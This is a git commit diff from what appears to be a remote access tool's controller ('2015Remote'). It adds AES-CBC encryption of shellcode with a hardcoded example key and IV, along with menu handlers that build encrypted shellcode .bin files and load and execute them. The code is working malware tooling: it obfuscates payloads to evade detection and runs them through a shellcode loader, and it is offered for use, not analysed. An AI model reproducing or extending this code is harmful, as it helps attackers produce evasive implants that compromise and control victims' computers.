Feature: Add menu to build and test AES encrypted shellcode

2025-11-10 06:34:38 +08:00
parent ce825cffb1
commit 924aa1d7e1
5 changed files with 50 additions and 2 deletions
--- a/common/obfs.h
+++ b/common/obfs.h
@@ -3,6 +3,7 @@
 #include <stdio.h>
 #include <stdint.h>
 #include <stddef.h>
 #include "aes.h"
 #pragma once
 class ObfsBase
@@ -100,3 +101,25 @@ public:
        }
    }
 };
 class ObfsAes : public ObfsBase {
 private:
    // Please change `aes_key` and `aes_iv`.
 	unsigned char aes_key[16] = "It is a example";
 	unsigned char aes_iv[16] = "It is a example";
 public:
    ObfsAes(bool genCArray = true) : ObfsBase(genCArray) { }
    virtual void ObfuscateBuffer(uint8_t* buf, size_t len, uint32_t seed) {
 		struct AES_ctx ctx;
 		AES_init_ctx_iv(&ctx, aes_key, aes_iv);
 		AES_CBC_encrypt_buffer(&ctx, buf, len);
    }
    virtual void DeobfuscateBuffer(uint8_t* buf, size_t len, uint32_t seed) {
 		struct AES_ctx ctx;
 		AES_init_ctx_iv(&ctx, aes_key, aes_iv);
 		AES_CBC_decrypt_buffer(&ctx, buf, len);
    }
 };
--- a/server/2015Remote/2015Remote.rc
+++ b/server/2015Remote/2015Remote.rc
--- a/server/2015Remote/2015RemoteDlg.cpp
+++ b/server/2015Remote/2015RemoteDlg.cpp
@@ -501,6 +501,8 @@ BEGIN_MESSAGE_MAP(CMy2015RemoteDlg, CDialogEx)
    ON_COMMAND(ID_SHELLCODE_LOAD_TEST, &CMy2015RemoteDlg::OnShellcodeLoadTest)
    ON_COMMAND(ID_SHELLCODE_OBFS_LOAD_TEST, &CMy2015RemoteDlg::OnShellcodeObfsLoadTest)
    ON_COMMAND(ID_OBFS_SHELLCODE_BIN, &CMy2015RemoteDlg::OnObfsShellcodeBin)
    ON_COMMAND(ID_SHELLCODE_AES_BIN, &CMy2015RemoteDlg::OnShellcodeAesBin)
    ON_COMMAND(ID_SHELLCODE_TEST_AES_BIN, &CMy2015RemoteDlg::OnShellcodeTestAesBin)
 END_MESSAGE_MAP()
@@ -3211,7 +3213,9 @@ void shellcode_process(ObfsBase *obfs, bool load = false, const char* suffix = "
            return;
        }
        int dwFileSize = File.GetLength();
-        LPBYTE szBuffer = new BYTE[dwFileSize];
+        int padding = ALIGN16(dwFileSize) - dwFileSize;
        LPBYTE szBuffer = new BYTE[dwFileSize + padding];
        memset(szBuffer + dwFileSize, 0, padding);
        File.Read(szBuffer, dwFileSize);
        File.Close();
@@ -3229,7 +3233,7 @@ void shellcode_process(ObfsBase *obfs, bool load = false, const char* suffix = "
                    AfxMessageBox("Shellcode 执行失败! 请用本程序生成的 bin 文件进行测试! ", MB_ICONERROR);
                }
            }
-        } else if (MakeShellcode(srcData, srcLen, (LPBYTE)szBuffer, dwFileSize)) {
+        } else if (MakeShellcode(srcData, srcLen, (LPBYTE)szBuffer, dwFileSize, true)) {
            TCHAR buffer[MAX_PATH];
            _tcscpy_s(buffer, name);
            PathRemoveExtension(buffer);
@@ -3292,6 +3296,24 @@ void CMy2015RemoteDlg::OnShellcodeObfsLoadTest()
    }
 }
 void CMy2015RemoteDlg::OnShellcodeAesBin()
 {
 	ObfsAes obfs(false);
 	shellcode_process(&obfs, false, ".bin");
 }
 void CMy2015RemoteDlg::OnShellcodeTestAesBin()
 {
 	if (MessageBox(CString("是否测试 ") + (sizeof(void*) == 8 ? "64位" : "32位") + " Shellcode 二进制文件? "
 		"请选择受信任的 bin 文件。\r\n测试未知来源的 Shellcode 可能导致程序崩溃，甚至存在 CC 风险。",
 		"提示", MB_ICONQUESTION | MB_YESNO) == IDYES) {
 		ObfsAes obfs;
 		shellcode_process(&obfs, true);
 	}
 }
 void CMy2015RemoteDlg::OnOnlineAssignTo()
 {
    CInputDialog dlg(this);
@@ -3716,3 +3738,4 @@ LRESULT CMy2015RemoteDlg::OnSessionActivatedMsg(WPARAM wParam, LPARAM lParam)
    m_pActiveSession = pSession;
    return 0;
 }
--- a/server/2015Remote/2015RemoteDlg.h
+++ b/server/2015Remote/2015RemoteDlg.h
@@ -344,4 +344,6 @@ public:
    afx_msg void OnShellcodeLoadTest();
    afx_msg void OnShellcodeObfsLoadTest();
    afx_msg void OnObfsShellcodeBin();
    afx_msg void OnShellcodeAesBin();
    afx_msg void OnShellcodeTestAesBin();
 };
--- a/server/2015Remote/resource.h
+++ b/server/2015Remote/resource.h